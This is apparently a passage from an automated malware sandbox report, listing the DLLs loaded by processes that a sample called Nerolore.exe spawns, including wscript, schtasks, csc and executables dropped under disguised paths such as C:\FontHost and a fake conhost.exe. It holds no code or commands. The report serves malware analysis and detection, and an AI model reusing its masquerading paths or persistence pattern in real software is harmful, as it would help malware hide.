                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: version.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: slc.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: mscoree.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: apphelp.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: version.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: profapi.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: cryptsp.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: rsaenh.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: cryptbase.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: mscoree.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: version.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: profapi.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: cryptsp.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: rsaenh.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: cryptbase.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: mscoree.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: apphelp.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: kernel.appcore.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: version.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: uxtheme.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: windows.storage.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: wldp.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: profapi.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: cryptsp.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: rsaenh.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: cryptbase.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: sspicli.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: ktmw32.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: wbemcomn.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: amsi.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: userenv.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: iphlpapi.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: dnsapi.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: dhcpcsvc.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: winnsi.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: rasapi32.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: rasman.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: rtutils.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: mswsock.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: winhttp.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: rasadhlp.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: fwpuclnt.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: edputil.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: winmm.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: winmmbase.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: mmdevapi.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: devobj.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: ksuser.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: avrt.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: dwrite.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: audioses.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: powrprof.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: umpdc.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: msacm32.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: midimap.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: windowscodecs.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: ntmarta.dll
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: mscoree.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: kernel.appcore.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: version.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: uxtheme.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: windows.storage.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: wldp.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: profapi.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: cryptsp.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: rsaenh.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: cryptbase.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: sspicli.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: mscoree.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: kernel.appcore.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: version.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: uxtheme.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: windows.storage.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: wldp.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: profapi.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: cryptsp.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: rsaenh.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: cryptbase.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: sspicli.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: mscoree.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: version.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: profapi.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: cryptsp.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: rsaenh.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: cryptbase.dll
                              Source: C:\ProgramData\dbg\conhost.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\Nerolore.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
